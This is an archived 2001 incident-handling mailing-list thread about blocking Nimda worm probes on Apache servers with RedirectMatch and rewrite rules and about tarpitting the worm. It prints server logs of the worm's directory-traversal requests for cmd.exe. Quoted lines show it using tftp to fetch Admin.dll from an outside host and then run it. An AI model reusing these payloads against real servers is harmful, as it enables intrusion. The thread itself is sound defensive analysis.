RE: Nimda Apache RedirectMatch results

["David Leitko" <dvd () gotblues com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I'm not having that experience..  I've thrown the following into
my httpd.conf: (Server version: Apache/1.3.14)

# bounce nimda
RedirectMatch 415 (.*)\.exe(.*)$

and I still only get 16 probes per host.  However, three of the
probes don't return with 415 for some reason... same three probes
on every "attack".. two return 400's and one returns 404...

thoughts?

xx - - [19/Sep/2001:16:13:46 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:13:48 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:13:55 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:02 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:03 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:49 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:50 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:52 -0700] "GET /msadc/..%255c../..%255c../..%255c/
                                                ..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:03 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:05 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
xx - - [19/Sep/2001:16:15:12 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:19 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:21 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
xx - - [19/Sep/2001:16:15:25 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
xx - - [19/Sep/2001:16:15:26 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:29 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
- --
David Leitko
dvd () leitko net
http://www.leitko.net 
PGP Fingerprint 9B5B 8853 2AA9 4546 211C  21DC 7D98 A825 8C88 0862

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBO6kqk32YqCWMiAhiEQLPAQCg+Dcb17ClDmyhVIvR0duh1yEIssgAoNCS
UUvRPcjiX9husckmZ3ErAU27
=0z4A
-----END PGP SIGNATURE-----

> -----Original Message-----
> From: Michael Halls [mailto:mhalls () nielsen net]
> Sent: Wednesday, September 19, 2001 1:21 PM
> To: George Milliken
> Cc: Incidents () Securityfocus Com
> Subject: RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis
> update
>
> On Wed, 19 Sep 2001, George Milliken wrote:
>
> > Maybe something like a rewrite rule
> >
> > RewriteEngine       On
> > RewriteRule ^.*/cmd.exe.*   [FL]
> > RewriteRule ^.*/root.exe.*  [FL]
> >
> > This will send "forbidden" to systems trying those URLs and will stop
> > rewrite processing.
>
> Actually this may increase the load to those servers.  When the worm's
> probe recieves anything other than a 404 (not found) it makes several other
> requests to the server to exploit the machines.  It first trys to copy the
> Admin.dll to the c:, d:, and e: drives:
>
> 216.156.1.151 - - [19/Sep/2001:12:30:13 -0700] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 51 "-" "-"
> 216.156.1.151 - - [19/Sep/2001:12:31:28 -0700] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20c:\Admin.dll
> HTTP/1.0" 200 51 "-" "-"
> 216.156.1.151 - - [19/Sep/2001:12:32:43 -0700] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20d:\Admin.dll
> HTTP/1.0" 200 51 "-" "-"
> 216.156.1.151 - - [19/Sep/2001:12:33:58 -0700] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20e:\Admin.dll
> HTTP/1.0" 200 51 "-" "-"
>
> The worm then attempts to execute the Admin.dll
>
> 216.156.1.151 - - [19/Sep/2001:12:35:13 -0700] "GET
> /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 51 "-" "-"
>
> This has the effect of increasing the traffic about 5 fold.
>
> The worm also will continue to probe/exploit the machine after it gets a
> "hit" so a machine that returns 403 (forbidden) for each of the 16 attacks
> would get about 80 hits to their website from each machine.  Playing
> around with some cgi scripts that tarpit requests it looks like the worm's
> tcp connections time out after 1 minute 30 seconds without a response.  By
> sleeping my script for about 1 minute 15 seconds I can hold a machine in
> my "tarpit" for about an hour and a half.
>
> Does anybody know if this thing is single threaded?


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com